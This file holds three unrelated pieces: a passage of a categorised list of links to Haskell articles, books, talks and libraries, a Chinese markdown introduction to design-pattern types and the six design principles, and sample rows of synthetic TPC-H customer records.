Domain](https://dev.to/samhh/function-domain-33fb) * [RecordDotSyntax in Haskell](https://dev.to/riccardoodone/recorddotsyntax-in-haskell-2jgl) * [Refactored Game Play!](https://mmhaskell.com/blog/2020/5/18/refactored-gameplay) * [A short exploration of GHC’s instance resolution hiding mistakes from the type checker](https://dorchard.blog/2020/06/03/a-short-exploration-of-ghcs-instance-resolution-hiding-mistakes-from-the-type-checker/) * [Simulated annealing](https://oleg.fi/gists/posts/2020-06-02-simulated-annealing.html) * [Colin Woodbury](https://www.fosskers.ca/en/blog/tolist) * [Haskell at Symbiont: Flexible Tests Selection](https://www.symbiont.io/post/haskell-at-symbiont-flexible-tests-selection) * [Neil Mitchell's Haskell Blog: Hoogle Searching Overview](https://neilmitchell.blogspot.com/2020/06/hoogle-searching-overview.html) * [Lorentz: Introducing Complex Objects to Michelson](https://serokell.io/blog/lorentz-complex-objects) * [Q-Learning with Tensors — Monday Morning Haskell](https://mmhaskell.com/blog/2020/6/8/q-learning-with-tensors) * [Using client-side Haskell web frameworks in CodeWorld](https://medium.com/@cdsmithus/using-client-side-haskell-web-frameworks-in-codeworld-7d8661647191) * [Simple Linear Regression in One Pass - DanielBrice.net](https://www.danielbrice.net/blog/simple-linear-regression-in-one-pass/) * [Solving Algorithm Challenges in Haskell: Anagrams - DEV](https://dev.to/theodesp/solving-algorithm-challenges-in-haskell-anagrams-15jd) * [Training our Agent with Haskell! 
— Monday Morning Haskell](https://mmhaskell.com/blog/2020/6/15/training-our-agent-with-haskell) * [Comparing the same web scraper in Haskell, Python, Go - DEV](https://dev.to/yujiri8/comparing-the-same-web-scraper-in-haskell-python-go-387a) * [Document generation & Rendered Source Code - DEV](https://dev.to/german1608/document-generation-rendered-source-code-10cb) * [Query-based compiler architectures | Olle Fredriksson's blog](https://ollef.github.io/blog/posts/query-based-compilers.html) * [Tweag - Splittable pseudo-random number generators in Haskell: random v1.1 and v1.2](https://www.tweag.io/blog/2020-06-29-prng-test/) * [Competitive programming in Haskell: data representation and optimization, with cake | blog :: Brent -> String](https://byorgey.wordpress.com/2020/06/29/competitive-programming-in-haskell-data-representation-and-optimization-with-cake/) # API * [Programming totally with head and tail](https://blog.poisson.chat/posts/2020-04-13-safe-head-tail.html) * [A Type-Safe Approach to Categorized Data](https://epeery.com/typesafe-approach-to-categorized-data/) * [Error Messages in Haskell, and how to Improve them](https://anthony.noided.media/blog/haskell/programming/2020/05/14/haskell-errors.html) * [Haskell - Data.Array.Log256 (SAFE, idiomatic and ⊥)](http://blog.stermon.com/articles/2020/05/22/haskell-data-array-log256-safe-idiomatic-and-bottom.html) * [bracketing and async exceptions in haskell](https://joeyh.name/blog/entry/bracketing_and_async_exceptions_in_haskell/) * do [The doomsday machine](https://tech.fretlink.com/the-doomsday-machine/) * exception * [THE THREE KINDS OF HASKELL EXCEPTIONS AND HOW TO USE THEM](https://www.tweag.io/posts/2020-04-16-exceptions-in-haskell.html) * IO [The power of IO in Haskell | 47 Degrees](https://www.47deg.com/blog/io-haskell/) * String [Eat Haskell String Types for Breakfast](https://free.cofree.io/2020/05/06/string-types/) # Book * 
[gumroad.com/discover?query=haskell](https://gumroad.com/discover?query=haskell) * [Haskell Snippets - 하스켈 조각 코드 모음집](https://wikidocs.net/book/820) * [learnyouahaskell.com](http://learnyouahaskell.com/) * [Happy Learn Haskell Tutorial](http://www.happylearnhaskelltutorial.com/contents.html) * [Haskell from the Very Beginning](https://www.haskellfromtheverybeginning.com) * [Haskell Programming](http://haskellbook.com/) * [Real World Haskell by Bryan O'Sullivan, Don Stewart, and John Goerzen](http://book.realworldhaskell.org/) * [I'm trying to update the Real World Haskell book](https://github.com/tssm/up-to-date-real-world-haskell) * [up-to-date-real-world-haskell: I'm trying to update the Real World Haskell book](https://github.com/tssm/up-to-date-real-world-haskell) * [To Kata Haskellen Evangelion](https://cosmius.bitbucket.io/tkhe/) * [WikibooksHaskell](https://wikidocs.net/book/204) # Conference * [LambdaConf 2015 - How to Learn Haskell in Less Than 5 Years Chris Allen](https://www.youtube.com/watch?v=Bg9ccYzMbxc) * [LambdaConf 2015 - Modeling Data in Haskell for Beginners Chris Allen](https://www.youtube.com/watch?v=p-NBJm0kIYU) * [LambdaConf 2015 - Developing Web Applications with Haskell Alejandro Serrano Mena](https://www.youtube.com/watch?v=FnaD4xS_hHY) * [ZuriHac 2020](https://zfoh.ch/zurihac2020/) * [ZuriHac 2020 - YouTube](https://www.youtube.com/playlist?list=PLiU7KJ5_df6aZbNfh_TUJt-6w9N3rYkTX) # Library * [Haskell with UTF-8](https://serokell.io/blog/haskell-with-utf8) * [Tools for working on GHC](https://mpickering.github.io/posts/2019-06-11-ghc-tools.html) * [Choosing an HTML library in Haskell](https://vrom911.github.io/blog/html-libraries) * [Implementing HTTP/3 in Haskell - あどけない話](https://kazu-yamamoto.hatenablog.jp/entry/2020/06/09/155236) * [Awake Security](https://github.com/awakesecurity) * [azure-demo - Haskell + Azure DevOps Demo](https://github.com/alasconnect/azure-demo/) * Cabal * [The Pain Points of Haskell: A Practical 
Summary](https://dixonary.co.uk/blog/haskell/pain) * [Caramel is a set of bidirectional, Haskell-inspired syntax-sugars that are expanded to, and contracted from, λ-Calculus terms](https://github.com/MaiaVictor/caramel) * [Cloud Haskell: Erlang-style concurrent and distributed programming in Haskell](http://haskell-distributed.github.io/) * [compleat - Generate command-line completions using a simple DSL. http://limpet.net/mbrubeck/2009/10/30/compleat.html](https://github.com/mbrubeck/compleat) * [A DSL for deep neural networks, supporting Caffe and Torch http://ajtulloch.github.io/dnngraph](https://github.com/ajtulloch/dnngraph) * [coreutils: Unix core utilities implemented in Haskell](https://github.com/Gandalf-/coreutils) * [coreutils/Split.hs at master · Gandalf-/coreutils](https://github.com/Gandalf-/coreutils/blob/master/Coreutils/Split.hs) * [Anardil — Haskell coreutils - split](https://anardil.net/2020/haskell-coreutils-split.html) * [dcfl is a parallelized constraint solving library for Haskell](http://poincare.github.io/DCFL/) * [fakedata - Haskell Library for producing quality fake data](https://github.com/psibi/fakedata/tree/d08b7b9ff41f3f91e3376ec573cf58f7a95c30b2) * [Frag - a 3D first person shooting game written in Haskell](https://wiki.haskell.org/Frag) * [Frege - a Haskell for the JVM](https://github.com/Frege/frege) * [Frege, a Haskell for the JVM by Dierk König](https://www.youtube.com/watch?v=1P1-HXNfFPc) * [Froskell - Haskell with unlockable features for teaching programming](https://secure.plaimi.net/papers/2015-01-16-froskell-programming-language.html) * [ghc-ios-scripts - Scripts for building GHC and Haskell programs for iOS](https://github.com/ghc-ios/ghc-ios-scripts) * [Gitpod Haskell - Gitpod Support for haskell](https://github.com/JesterOrNot/Gitpod-Haskell) * [h4sh - Fork of Don Stewarts h4sh haskell shell scripts http://www.cse.unsw.edu.au/~dons/h4sh.html](https://github.com/cpennington/h4sh) * [Hakyll - a Haskell library for 
generating static sites, mostly aimed at small-to-medium sites and personal blogs](https://jaspervdj.be/hakyll/) * [Hakyll Pt. 1 – Setup & Initial Customization](https://robertwpearce.com/hakyll-pt-1-setup-and-initial-customization.html) * [Hakyll Pt. 2 – Generating a Sitemap XML File](https://robertwpearce.com/hakyll-pt-2-generating-a-sitemap-xml-file.html) * [Hakyll Pt. 3 – Generating RSS and Atom XML Feeds](https://robertwpearce.com/hakyll-pt-3-generating-rss-and-atom-xml-feeds.html) * [Hakyll Pt. 4 – Copying Static Files For Your Build](https://robertwpearce.com/hakyll-pt-4-copying-static-files-for-your-build.html) * [Hakyll Pt. 5 – Generating Custom Post Filenames From a Title Slug](https://robertwpearce.com/hakyll-pt-5-generating-custom-post-filenames-from-a-title-slug.html) * [Hakyll Pt. 6 – Pure Builds With Nix](https://robertwpearce.com/hakyll-pt-6-pure-builds-with-nix.html) * [Haskell for Mac is an easy-to-use integrated programming environment for the functional programming language Haskell](http://haskellformac.com/) * [haskell-language-server - Integration point for ghcide and haskell-ide-engine. 
One IDE to rule them all](https://github.com/haskell/haskell-language-server) * [Neil Mitchell's Haskell Blog: Fixing Space Leaks in Ghcide](https://neilmitchell.blogspot.com/2020/05/fixing-space-leaks-in-ghcide.html) * [HaskellR - Programming R in Haskell](https://tweag.github.io/HaskellR/) * [Programming R at native speed using Haskell](http://www.tweag.io/blog/programming-r-at-native-speed-using-haskell) * [HaNS - The haskell network stack](https://github.com/GaloisInc/HaNS) * [Hasura - A Batteries-included App Development Platform](http://hasura.io/) * [Haxl - A Haskell library that simplifies access to remote data, such as databases or web-based services](https://github.com/facebook/Haxl) * [하스켈학교 세미나 - Haxl](https://www.slideshare.net/jooyunghan/haxl-63764110) * [GC처럼 동시성 문제를?](https://medium.com/@jooyunghan/gc%EC%B2%98%EB%9F%BC-%EB%8F%99%EC%8B%9C%EC%84%B1-%EB%AC%B8%EC%A0%9C%EB%A5%BC-7ab792636c0c) * [HiDb: A Haskell In-Memory Relational Database](http://www.scs.stanford.edu/14sp-cs240h/projects/puttagunta_debray_tu.pdf) * [HLint 3.0 uses the GHC parser](https://neilmitchell.blogspot.com/2020/05/hlint-30.html) * [HLint --cross was accidentally quadratic](https://neilmitchell.blogspot.com/2020/05/hlint-cross-was-accidentally-quadratic.html) * [Idris-Java - Idris Java Backend - This is an updated version of the Java backend for Idris](https://github.com/idris-hackers/idris-java) * [inline-java - Calling to the JVM from Haskell: Some benchmarks](https://www.tweag.io/blog/2020-06-11-inline-java-benchmarks/) * [it-has - A Generic implementation of data-has](https://github.com/dnikolovv/it-has) * [knit ties the knot on data structures that reference each other by unique keys](https://github.com/pkamenarsky/knit) * [Leksah - the Haskell IDE of choice](http://leksah.org/) * [Mu-Haskell - a set of packages that help you build both servers and clients for (micro)services](https://higherkindness.io/mu-haskell/) gRPC * [Introducing Mu-Haskell 
v0.1](https://www.47deg.com/blog/introducing-mu-haskell-0-1/) * nix * [SF Scala: Enhancing Spark's Power with ZIO, Qubism and NLP at Scale, Using Nix for Haskell](https://www.youtube.com/watch?v=Ov7WZroBkv0) * [Building a reproducible blog with Nix](https://blog.ysndr.de/posts/internals/2020-04-10-built-with-nix/) * nixpkgs [IDE 2020: Getting ghcide into nixpkgs](https://mpickering.github.io/ide/posts/2020-06-05-ghcide-and-nixpkgs.html) * OptParse * [Option parsing in Haskell, Part 2: A standard approach to settings in Haskell](https://cs-syd.eu/posts/2020-05-14-option-parsing-2) * [overloaded: Overloaded pragmas as a plugin](https://hackage.haskell.org/package/overloaded-0.2.1) * [overloaded-0.2.1: Overloaded:Categories](https://oleg.fi/gists/posts/2020-05-04-overloaded-categories.html) * [overloaded-0.2.1: Overloaded:Do](https://oleg.fi/gists/posts/2020-04-27-overloaded-local-do.html) * [overloaded-0.2.1: Overloaded:Unit](https://oleg.fi/gists/posts/2020-05-11-overloaded-unit.html) * [Bitonic sort: an example of Overloaded:Categories and Staged programming](https://oleg.fi/gists/posts/2020-05-19-bitonic-sort.html) * Pandoc [Custom Markdown in Pandoc](https://dev.to/riccardoodone/custom-markdown-in-pandoc-43hf) * Parsec * [Parsing the untyped λ-calculus with Parsec](http://mattwetmore.me/posts/parsing-combinators-with-parser-combinators.html) * [password - provides packages for easily working with passwords in Haskell](https://github.com/cdepillabout/password) * [polysemy: Higher-order, low-boilerplate, zero-cost free monads](https://hackage.haskell.org/package/polysemy) * [Polysemy - Part I - Introduction](https://sir4ur0n.github.io/posts/intro-polysemy.html) * [Polysemy - Part II - First example](https://sir4ur0n.github.io/posts/polysemy-first-example.html) * [Polysemy - Part III - Tests](https://sir4ur0n.github.io/posts/polysemy-tests.html) * [Writing a discord library using Polysemy](https://nitros12.github.io/writing-a-discord-library-using-polysemy/) * 
[Reanimate](https://reanimate.readthedocs.io/) * [rei - Process lists easily with](https://github.com/kerkomen/rei) * [Servant - Webservice API combinators](http://haskell-servant.github.io/) * [A Servant API Testing Example From the Wild](https://vadosware.io/post/a-servant-api-testing-example-from-the-wild/) * [servant-forma This package provides a servant combinator to validate your Forma based forms before they reach your handlers](https://github.com/aveltras/servant-forma/) * [Shake 0.19 - changes to process execution](https://neilmitchell.blogspot.com/2020/05/shake-019-changes-to-process-execution.html) * [singlethongs: Like singletons, but much smaller](https://hackage.haskell.org/package/singlethongs-0.1) * [SIXEL Library for Haskell](https://github.com/junjihashimoto/sixel) * [souffle-haskell - Haskell bindings for the Souffle datalog language](https://github.com/luc-tielen/souffle-haskell/) * [Spock - SIMPLE. EXPRESSIVE. FAST. Kickstart your next Haskell web application within seconds using Spock](http://www.spock.li/) * [stack - a new, complete, cross-platform development tool aimed at both new and experienced Haskell developers](https://www.fpcomplete.com/blog/2015/06/announcing-first-public-beta-stack) * [stack 0.1 released](https://www.fpcomplete.com/blog/2015/06/stack-0-1-release) * [Why is stack not cabal?](https://www.fpcomplete.com/blog/2015/06/why-is-stack-not-cabal) * [turtle embeds shell scripting directly within Haskell](http://hackage.haskell.org/package/turtle-1.0.0/docs/Turtle-Tutorial.html) * [Twilio IVR - A fluent Twilio IVR library for Haskell](https://github.com/steven777400/TwilioIVR/) * wai * [Your First Haskell Web App With WAI And Warp by Michael Snoyman #FnConf19 - YouTube](https://www.youtube.com/watch?v=mz5_HmLGRXc) * [Yesod Web Framework](https://github.com/yesodweb) * [Basics of Yesod](https://www.schoolofhaskell.com/school/starting-with-haskell/libraries-and-frameworks/basics-of-yesod) * [Yi - Text editor written in 
Haskell](http://yi-editor.github.io/) # Monad * ["Build Your Own Probability Monads" paper, blog posts and source code](http://www.randomhacks.net/probability-monads/) * [Free and Freer Monads: Putting Monads Back into Closet](http://okmij.org/ftp/Computation/free-monad.html) * [Haskell Monads in 8 Minutes](https://www.youtube.com/watch?v=gEoruozy3mk) * [In Haskell, what does the phrase "monadic bind" mean?](https://www.quora.com/In-Haskell-what-does-the-phrase-monadic-bind-mean) * [Indexed Monads: Examples and Discussion](https://wespiser.com/posts/2020-05-06-IxMonad.html) * [A guide to monads in Haskell](https://medium.com/swlh/a-guide-to-monads-in-haskell-fe1c0e4457c1) * [Hierarchical Free Monads: The Most Developed Approach In Haskell](https://github.com/graninas/hierarchical-free-monads-the-most-developed-approach-in-haskell/blob/7472b5c1a073366d87153dd3976873687422c8b1/README.md) * [Hierarchical Free Monads: Mostly Pointless](https://github.com/effectfully/sketches/tree/42166f6f13a87f749fd30f938a6c0f3600385f35/hierarchical-free-monads-mostly-pointless#readme) * [Understand IO Monad and implement it yourself in Haskell](https://boxbase.org/entries/2020/may/18/diy-io-monad/) # TDD, Test * [Rewriting to Haskell–Testing](https://odone.io/posts/2020-04-13-rewriting-haskell-testing.html) * [Servant Testing Helpers!](https://mmhaskell.com/blog/2020/3/30/servant-testing-helpers) * [Property testing in depth: genvalidity's fixed-size type generators](https://cs-syd.eu/posts/2020-04-28-genvalidity-improvements) # Test * [Porting the Pusher integration tests to Haskell](https://blog.pusher.com/porting-the-pusher-integration-tests-to-haskell/) * [TESTABLE IO IN HASKELL](http://engineering.imvu.com/2015/06/20/testable-io-in-haskell-2/) * [HASKELL: UNEXPECTEDLY MAKING IT HARDER TO UNIT TEST](https://atilanevesoncode.wordpress.com/2015/09/14/haskell-unexpectedly-making-it-harder-to-unit-test/) * [Unit testing IO in 
Haskell](https://blog.pusher.com/unit-testing-io-in-haskell/) * [Hedgehog - a modern property-based testing system](https://github.com/hedgehogqa/haskell-hedgehog) * [Time Travelling and Fixing Bugs with Property-Based Testing](https://wickstrom.tech/programming/2019/11/17/time-travelling-and-fixing-bugs-with-property-based-testing.html) * [QuickCheck - a combinator library originally written in Haskell](https://en.wikipedia.org/wiki/QuickCheck) # Type * [Announcing the refinement types library](http://nikita-volkov.github.io/refined/) * [Map of numeric types in Haskell](http://engineering.sumall.com/map-of-numeric-types-in-haskell/) * [Dependently typed programming and theorem proving in Haskell](https://jeltsch.wordpress.com/2012/04/30/dependently-typed-programming-and-theorem-proving-in-haskell/) * [Zippers And Type Magic](https://keb.theoremsfor.me/zippers-and-type-magic/) * [Haskell's Type Classes: We Can Do Better](http://degoes.net/articles/principled-typeclasses/) * [Type Families and Pokemon](https://www.schoolofhaskell.com/school/to-infinity-and-beyond/pick-of-the-week/type-families-and-pokemon) * [thinking-with-types - source material for Thinking with Types http://thinkingwithtypes.com ](https://github.com/isovector/thinking-with-types) * [solutions.pdf](https://github.com/isovector/thinking-with-types/blob/master/solutions.pdf) * [Typed type-level programming in Haskell, part I: functional dependencies](https://byorgey.wordpress.com/2010/06/29/typed-type-level-programming-in-haskell-part-i-functional-dependencies) * [Typed type-level programming in Haskell, part II: type families](https://byorgey.wordpress.com/2010/07/06/typed-type-level-programming-in-haskell-part-ii-type-families/) * [Typed type-level programming in Haskell, part III: I can haz typs plz?](https://byorgey.wordpress.com/2010/07/19/typed-type-level-programming-in-haskell-part-iii-i-can-haz-typs-plz/) * [MultiParam Typeclasses](http://dev.stephendiehl.com/hask/#multiparam-typeclasses) 
functional dependencies * [MultiParam Typeclasses](https://gist.github.com/nattybear/7fd19deb2097e3d7fe73088b1b6970f4) * [Parallel typeclass for Haskell](https://gvolpe.github.io/blog/parallel-typeclass-for-haskell/) * [Types vs. datatypes vs. typeclasses in Haskell](https://jesseevers.com/haskell-types/) * [Basic Type Level Programming in Haskell](https://www.parsonsmatt.org/2017/04/26/basic_type_level_programming_in_haskell.html) * [Haskell’s Type Families](https://web.facebook.com/notes/%ED%95%98%EC%8A%A4%EC%BC%88-%ED%95%99%EA%B5%90/haskells-type-families/2645916715429823/) * [Typeable — A long journey to type-safe dynamic type representation (Part 1)](https://medium.com/@hgiasac/typeable-a-long-journey-to-type-safe-dynamic-type-representation-9070eac2cf8b) * [Typeable — A long journey to type-safe dynamic type representation (Part 2)](https://medium.com/@hgiasac/typeable-a-long-journey-to-type-safe-dynamic-type-representation-part-2-954b52bfa9fa) * [Typeable — A long journey to type-safe dynamic type representation (Part 3)](https://medium.com/@hgiasac/typeable-a-long-journey-to-type-safe-dynamic-type-representation-part-3-80a2a34329dd) * [Trade-Offs in Type Safety](https://alpacaaa.net/type-safety/) * [Type inference - Splinter Suidman](https://splintah.gitlab.io/posts/2020-06-14-Type-inference.html) # Tutorial * [INTRODUCTION TO FUNCTIONAL PROGRAMMING USING HASKELL](https://1ambda.github.io/haskell/) 한글 * [CIS 194: Introduction to Haskell (Spring 2013)](https://www.seas.upenn.edu/~cis194/spring13/) * [enshahar.com](http://enshahar.com/) 한글 * [Haskell for impatient Scala developer: Getting into speed](https://msitko.pl/blog/2020/02/08/haskell-getting-into-speed.html) * [**진보하는 함수형 언어, Haskell (김재우)**](https://www.notion.so/Haskell-84c22c4bb40a46438dc6757424827fca) * [Why Haskell Matters](https://github.com/thma/WhyHaskellMatters) * [THINGS SOFTWARE ENGINEERS TRIP UP ON WHEN LEARNING 
HASKELL](https://williamyaoh.com/posts/2020-04-12-software-engineer-hangups.html) * [10 Reasons to Use Haskell](https://serokell.io/blog/10-reasons-to-use-haskell) * [Learning Haskell: Getting Started](https://levelup.gitconnected.com/learning-haskell-getting-started-9f34155456e) * [Learning Haskell: Getting Setup](https://levelup.gitconnected.com/learning-haskell-getting-setup-c1f2cc69d915) * [Getting Started with Haskell on Fedora - Fedora Magazine](https://fedoramagazine.org/getting-started-with-haskell-on-fedora/) * [FizzBuzz - You Suck at Coding 0 - YouTube](https://www.youtube.com/watch?v=mZWsyUKwTbg)
{ "pile_set_name": "Github" }
## 设计模式 > 设计模式(Design pattern)代表了最佳的实践,通常被有经验的面向对象的软件开发人员所采用。设计模式是软件开发人员在软件开发过程中面临的一般问题的解决方案。这些解决方案是众多软件开发人员经过相当长的一段时间的试验和错误总结出来的。 设计模式是一套被反复使用的、多数人知晓的、经过分类编目的、代码设计经验的总结。使用设计模式是为了重用代码、让代码更容易被他人理解、保证代码可靠性。 毫无疑问,设计模式于己于他人于系统都是多赢的,设计模式使代码编制真正工程化,设计模式是软件工程的基石,如同大厦的一块块砖石一样。项目中合理地运用设计模式可以完美地解决很多问题,每种模式在现实中都有相应的原理来与之对应,每种模式都描述了一个在我们周围不断重复发生的问题,以及该问题的核心解决方案,这也是设计模式能被广泛应用的原因。 ### 设计模式的类型 根据设计模式的参考书 **Design Patterns - Elements of Reusable Object-Oriented Software(中文译名:设计模式 - 可复用的面向对象软件元素)** 中所提到的,总共有 23 种设计模式。这些模式可以分为三大类:创建型模式(Creational Patterns)、结构型模式(Structural Patterns)、行为型模式(Behavioral Patterns) | 序号 | 模式 & 描述 | 包括 | | ---- | ------------------------------------------------------------ | ------------------------------------------------------------ | | 1 | **创建型模式** 这些设计模式提供了一种在创建对象的同时隐藏创建逻辑的方式,而不是使用 new 运算符直接实例化对象。这使得程序在判断针对某个给定实例需要创建哪些对象时更加灵活。 | 工厂模式(Factory Pattern)抽象工厂模式(Abstract Factory Pattern)单例模式(Singleton Pattern)建造者模式(Builder Pattern)原型模式(Prototype Pattern) | | 2 | **结构型模式** 这些设计模式关注类和对象的组合。继承的概念被用来组合接口和定义组合对象获得新功能的方式。 | 适配器模式(Adapter Pattern)桥接模式(Bridge Pattern)过滤器模式(Filter、Criteria Pattern)组合模式(Composite Pattern)装饰器模式(Decorator Pattern)外观模式(Facade Pattern)享元模式(Flyweight Pattern)代理模式(Proxy Pattern) | | 3 | **行为型模式** 这些设计模式特别关注对象之间的通信。 | 责任链模式(Chain of Responsibility Pattern)命令模式(Command Pattern)解释器模式(Interpreter Pattern)迭代器模式(Iterator Pattern)中介者模式(Mediator Pattern)备忘录模式(Memento Pattern)观察者模式(Observer Pattern)状态模式(State Pattern)空对象模式(Null Object Pattern)策略模式(Strategy Pattern)模板模式(Template Pattern)访问者模式(Visitor Pattern) | ### 设计模式的六大原则 **1、开闭原则(Open Closed Principle)** 开闭原则的意思是:**对扩展开放,对修改关闭**。在程序需要进行拓展的时候,不能去修改原有的代码,实现一个热插拔的效果。简言之,是为了使程序的扩展性好,易于维护和升级。想要达到这样的效果,我们需要使用接口和抽象类。 > 实现热插拔,提高扩展性。 **2、里氏代换原则(Liskov Substitution Principle)** 里氏代换原则是面向对象设计的基本原则之一。 里氏代换原则中说,任何基类可以出现的地方,子类一定可以出现。LSP 是继承复用的基石,只有当派生类可以替换掉基类,且软件单位的功能不受到影响时,基类才能真正被复用,而派生类也能够在基类的基础上增加新的行为。里氏代换原则是对开闭原则的补充。实现开闭原则的关键步骤就是抽象化,而基类与子类的继承关系就是抽象化的具体实现,所以里氏代换原则是对实现抽象化的具体步骤的规范。 > 实现抽象的规范,实现子父类互相替换; 
**3、依赖倒转原则(Dependency Inversion Principle)** 这个原则是开闭原则的基础,具体内容:针对接口编程,依赖于抽象而不依赖于具体。 > 针对接口编程,实现开闭原则的基础; **4、接口隔离原则(Interface Segregation Principle)** 这个原则的意思是:使用多个隔离的接口,比使用单个接口要好。它还有另外一个意思是:降低类之间的耦合度。由此可见,其实设计模式就是从大型软件架构出发、便于升级和维护的软件设计思想,它强调降低依赖,降低耦合。 > 降低耦合度,接口单独设计,互相隔离; **5、迪米特法则,又称最少知道原则(Demeter Principle)** 最少知道原则是指:一个实体应当尽量少地与其他实体之间发生相互作用,使得系统功能模块相对独立。 > 功能模块尽量独立 **6、合成复用原则(Composite Reuse Principle)** 合成复用原则是指:尽量使用合成/聚合的方式,而不是使用继承。 > 尽量使用聚合,组合,而不是继承;
{ "pile_set_name": "Github" }
1|Customer#000000001|IVhzIApeRb ot,c,E|15|25-989-741-2988|711.56|BUILDING|to the even, regular platelets. regular, ironic epitaphs nag e 2|Customer#000000002|XSTf4,NCwDVaWNe6tEgvwfmRchLXak|13|23-768-687-3665|121.65|AUTOMOBILE|l accounts. blithely ironic theodolites integrate boldly: caref 3|Customer#000000003|MG9kdTD2WBHm|1|11-719-748-3364|7498.12|AUTOMOBILE| deposits eat slyly ironic, even instructions. express foxes detect slyly. blithely even accounts abov 4|Customer#000000004|XxVSJsLAGtn|4|14-128-190-5944|2866.83|MACHINERY| requests. final, regular ideas sleep final accou 5|Customer#000000005|KvpyuHCplrB84WgAiGV6sYpZq7Tj|3|13-750-942-6364|794.47|HOUSEHOLD|n accounts will have to unwind. foxes cajole accor 6|Customer#000000006|sKZz0CsnMD7mp4Xd0YrBvx,LREYKUWAh yVn|20|30-114-968-4951|7638.57|AUTOMOBILE|tions. even deposits boost according to the slyly bold packages. final accounts cajole requests. furious 7|Customer#000000007|TcGe5gaZNgVePxU5kRrvXBfkasDTea|18|28-190-982-9759|9561.95|AUTOMOBILE|ainst the ironic, express theodolites. express, even pinto beans among the exp 8|Customer#000000008|I0B10bB0AymmC, 0PrRYBCP1yGJ8xcBPmWhl5|17|27-147-574-9335|6819.74|BUILDING|among the slyly regular theodolites kindle blithely courts. carefully even theodolites haggle slyly along the ide 9|Customer#000000009|xKiAFTjUsCuxfeleNqefumTrjS|8|18-338-906-3675|8324.07|FURNITURE|r theodolites according to the requests wake thinly excuses: pending requests haggle furiousl 10|Customer#000000010|6LrEaV6KR6PLVcgl2ArL Q3rqzLzcT1 v2|5|15-741-346-9870|2753.54|HOUSEHOLD|es regular deposits haggle. fur 11|Customer#000000011|PkWS 3HlXqwTuzrKg633BEi|23|33-464-151-3439|-272.60|BUILDING|ckages. requests sleep slyly. quickly even pinto beans promise above the slyly regular pinto beans. 12|Customer#000000012|9PWKuhzT4Zr1Q|13|23-791-276-1263|3396.49|HOUSEHOLD| to the carefully final braids. blithely regular requests nag. 
ironic theodolites boost quickly along 13|Customer#000000013|nsXQu0oVjD7PM659uC3SRSp|3|13-761-547-5974|3857.34|BUILDING|ounts sleep carefully after the close frays. carefully bold notornis use ironic requests. blithely 14|Customer#000000014|KXkletMlL2JQEA |1|11-845-129-3851|5266.30|FURNITURE|, ironic packages across the unus 15|Customer#000000015|YtWggXoOLdwdo7b0y,BZaGUQMLJMX1Y,EC,6Dn|23|33-687-542-7601|2788.52|HOUSEHOLD| platelets. regular deposits detect asymptotes. blithely unusual packages nag slyly at the fluf 16|Customer#000000016|cYiaeMLZSMAOQ2 d0W,|10|20-781-609-3107|4681.03|FURNITURE|kly silent courts. thinly regular theodolites sleep fluffily after 17|Customer#000000017|izrh 6jdqtp2eqdtbkswDD8SG4SzXruMfIXyR7|2|12-970-682-3487|6.34|AUTOMOBILE|packages wake! blithely even pint 18|Customer#000000018|3txGO AiuFux3zT0Z9NYaFRnZt|6|16-155-215-1315|5494.43|BUILDING|s sleep. carefully even instructions nag furiously alongside of t 19|Customer#000000019|uc,3bHIx84H,wdrmLOjVsiqXCq2tr|18|28-396-526-5053|8914.71|HOUSEHOLD| nag. furiously careful packages are slyly at the accounts. furiously regular in 20|Customer#000000020|JrPk8Pqplj4Ne|22|32-957-234-8742|7603.40|FURNITURE|g alongside of the special excuses-- fluffily enticing packages wake 21|Customer#000000021|XYmVpr9yAHDEn|8|18-902-614-8344|1428.25|MACHINERY| quickly final accounts integrate blithely furiously u 22|Customer#000000022|QI6p41,FNs5k7RZoCCVPUTkUdYpB|3|13-806-545-9701|591.98|MACHINERY|s nod furiously above the furiously ironic ideas. 23|Customer#000000023|OdY W13N7Be3OC5MpgfmcYss0Wn6TKT|3|13-312-472-8245|3332.02|HOUSEHOLD|deposits. special deposits cajole slyly. fluffily special deposits about the furiously 24|Customer#000000024|HXAFgIAyjxtdqwimt13Y3OZO 4xeLe7U8PqG|13|23-127-851-8031|9255.67|MACHINERY|into beans. fluffily final ideas haggle fluffily 25|Customer#000000025|Hp8GyFQgGHFYSilH5tBfe|12|22-603-468-3533|7133.70|FURNITURE|y. accounts sleep ruthlessly according to the regular theodolites. 
unusual instructions sleep. ironic, final 26|Customer#000000026|8ljrc5ZeMl7UciP|22|32-363-455-4837|5182.05|AUTOMOBILE|c requests use furiously ironic requests. slyly ironic dependencies us 27|Customer#000000027|IS8GIyxpBrLpMT0u7|3|13-137-193-2709|5679.84|BUILDING| about the carefully ironic pinto beans. accoun 28|Customer#000000028|iVyg0daQ,Tha8x2WPWA9m2529m|8|18-774-241-1462|1007.18|FURNITURE| along the regular deposits. furiously final pac 29|Customer#000000029|sJ5adtfyAkCK63df2,vF25zyQMVYE34uh|0|10-773-203-7342|7618.27|FURNITURE|its after the carefully final platelets x-ray against 30|Customer#000000030|nJDsELGAavU63Jl0c5NKsKfL8rIJQQkQnYL2QJY|1|11-764-165-5076|9321.01|BUILDING|lithely final requests. furiously unusual account 31|Customer#000000031|LUACbO0viaAv6eXOAebryDB xjVst|23|33-197-837-7094|5236.89|HOUSEHOLD|s use among the blithely pending depo 32|Customer#000000032|jD2xZzi UmId,DCtNBLXKj9q0Tlp2iQ6ZcO3J|15|25-430-914-2194|3471.53|BUILDING|cial ideas. final, furious requests across the e 33|Customer#000000033|qFSlMuLucBmx9xnn5ib2csWUweg D|17|27-375-391-1280|-78.56|AUTOMOBILE|s. slyly regular accounts are furiously. carefully pending requests 34|Customer#000000034|Q6G9wZ6dnczmtOx509xgE,M2KV|15|25-344-968-5422|8589.70|HOUSEHOLD|nder against the even, pending accounts. even 35|Customer#000000035|TEjWGE4nBzJL2|17|27-566-888-7431|1228.24|HOUSEHOLD|requests. special, express requests nag slyly furiousl 36|Customer#000000036|3TvCzjuPzpJ0,DdJ8kW5U|21|31-704-669-5769|4987.27|BUILDING|haggle. enticing, quiet platelets grow quickly bold sheaves. carefully regular acc 37|Customer#000000037|7EV4Pwh,3SboctTWt|8|18-385-235-7162|-917.75|FURNITURE|ilent packages are carefully among the deposits. furiousl 38|Customer#000000038|a5Ee5e9568R8RLP 2ap7|12|22-306-880-7212|6345.11|HOUSEHOLD|lar excuses. closely even asymptotes cajole blithely excuses. 
